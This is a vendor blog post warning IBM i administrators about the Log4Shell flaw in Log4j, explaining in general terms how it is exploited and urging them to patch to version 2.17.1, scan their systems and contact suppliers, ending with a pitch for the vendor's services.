ID-INFO blog

Is your IBM i vulnerable to Log4j cyber attacks?

Let’s end the suspense right now: the answer is YES.

Log4Shell, an Internet vulnerability affecting millions of computers, involves an obscure but almost ubiquitous software component, Log4j.

Log4Shell poses the most serious vulnerability

The software is used to record all sorts of activities taking place under the hood in a wide range of computer systems, including theIBM i.

Jen Easterly, Director of the U.S. Cybersecurity & Infrastructure Security Agency, described Log4Shell as most serious vulnerability she has seen in her career, as well as one of our best safety colleagues, Bruce F. Bading. There have already been hundreds of thousands, perhaps millions, of attempts to exploit the vulnerability.

What does Log4j do?

Log4j records events – errors and routine system operations – and communicates diagnostic messages about them to system administrators and users. It’s a open source software provided by Apache Software Foundation.

How does Log4Shell work?

Log4Shell works by abusing a Log4j feature that allows users to specify custom code to format a log message. This feature enables Log4j, for example, to log not only the username associated with each server connection attempt, but also the person’s real name, if a separate server contains a directory linking usernames and real names. To do this, the Log4j server must communicate with the server holding the real names.

Log4j opens the door to “hackers” and security holes

Unfortunately, this type of code can be used for more than just formatting log messages. Vulnerable versions of Log4j allow third-party servers to submit software code capable of performing all kinds of actions on the targeted computer. This opens the door to nefarious activities such as stealing sensitive information, taking complete control of the targeted system and transferring malicious content to other users communicating with the server concerned.

Log4Shell is easy to use

Log4Shell is relatively easy to use. I was able to reproduce the problem in my copy of Ghidra, a reverse-engineering framework for security researchers, in just a few minutes. There’s a very low bar for using this exploit, which means more people with malicious intent can use it.

Log4j is everywhere – including IBM i

One of the main concerns regarding Log4Shell is Log4j’s position in the software ecosystem. Logging is a fundamental feature of most software, which makes it possible to Log4j very widespread. It is used in IBM WebSphere (WAS), IBM i Navigator, Apache HTTP, IBM i HA software, cloud services such as Apple iCloud and Amazon Web Services, as well as a wide range of programs from software development tools at safety tools and any version of IBM i Client Solutions prior to 1.8.8.7.

This means that hackers have a wide range of targets to choose from: IBM i users, service providers, source code developers and even security researchers. So, while large companies like IBM and Amazon can quickly patch their web services to prevent hackers from exploiting them, many other organizations will take longer to patch their systems, and some may not even know they need it.

The damage that can be caused

Hackers scour the Internet for vulnerable servers and set up machines capable of delivering malicious payloads. To carry out an attack, they query services (e.g. web servers) and attempt to trigger a log message (e.g. a 404 error). The request includes maliciously constructed text, which Log4j treats as instructions.

These instructions can create a shell, which allows the attacking server to remotely control the target server, or they can integrate the target server into a botnet. Botnets use several hacked computers to carry out coordinated actions on behalf of the hackers.

Hackers are already abusing Log4Shell… And in new ways. Ouch!

A large number of pirates are already trying to abuse Log4Shell. These range from ransomware gangs at hacker groups trying to mine bitcoin and hackers associated with China and North Korea trying to gain access to the sensitive information of their geopolitical rivals. The Belgian Ministry of Defence reported that its computers were attacked using Log4Shell.

Although the vulnerability first received widespread attention on December 9, 2021, people continue to identify new ways to cause damage through this mechanism.

How do I stop Log4j bleeding?

It is difficult to know whether Log4j is used in a given software system, since it is often integrated with other software. This forces system administrators to inventory their software to identify its presence. If some people don’t even know they have a problem, it’s that much harder to eradicate vulnerability, and you can’t defend yourself against what you don’t know.

Another consequence of Log4j’s various uses is that there is no single solution for correcting it. Depending on how Log4j has been integrated into a given system, the patch will require different approaches. This may require a general system update, as is the case for some Cisco routers, or an upgrade to a new software version, or manual removal of the vulnerable code for those unable to update the software.

Log4Shell is part of the software supply chain. Like the physical objects people buy, software travels through different organizations and packages before ending up in a final product. When something goes wrong, rather than going through a callback process, the software is usually “ patched “In other words, corrected on the spot.

Log4Shell patches may be delayed

However, since Log4j is present in various ways in software products, the propagation of a patch requires the coordination of Log4j developers, software developers who use Log4j, software distributors, system operators and users. This usually introduces a delay between the availability of the patch in the Log4j code and users’ computers closing the door on the vulnerability.

Some estimates of software repair time range from from a few weeks to several months. However, if past behavior is indicative of future performance, it is likely that the Log4j will emerge in the years to come.

As a user, you’re probably wondering what you can do about all this. Unfortunately, it’s difficult to know whether a software product you’re using includes Log4j and whether it uses vulnerable versions of the software.

What you can do NOW to protect yourself from Log4Shell vulnerabilities

However, you can help by heeding the common refrain of IT security experts:

  • Make sure all your software is up to date.
  • Contact your third-party suppliers for updates.
  • Remove or disable any vulnerable versions as soon as possible

This is particularly important if you are using an earlier or end-of-support (EOS) version of IBM i (prior to V7.3 or V7.4).

Analyses of every IBM i system, including older, unsupported operating systems, find dozens of vulnerable log4j files in the IFS. No system is immune, and the older it is, the more vulnerable it is.

Although the first attacks on vulnerable versions of log4j focused on remote LDAP servers, attention shifted in mid-December to the Java Virtual Machine (JVM) Remote Method Invocation (RMI).

This means that any server, including IBM i running JVM RMI, is vulnerable to a catastrophic attack.

This diagram shows how the attack was carried out.

 

Any version of log4j prior to 2.17.1 is vulnerable.

The Center of Internet Security has the most up-to-date information available. The best advice we can give you is to be careful about where you get your information, as this can leave you vulnerable to attack.

The best thing to do is to scan now, before it’s too late.

Log4j Zero-Day Vulnerability Response (cisecurity.org) – Original article by Bob Losey: https: //cutt.ly/DPAcTSM

Do you have any questions or projects concerning log4j vulnerability? Our teams are at your service. Contact us on 01 88 32 12 34, or via the contact form.

Partager cet article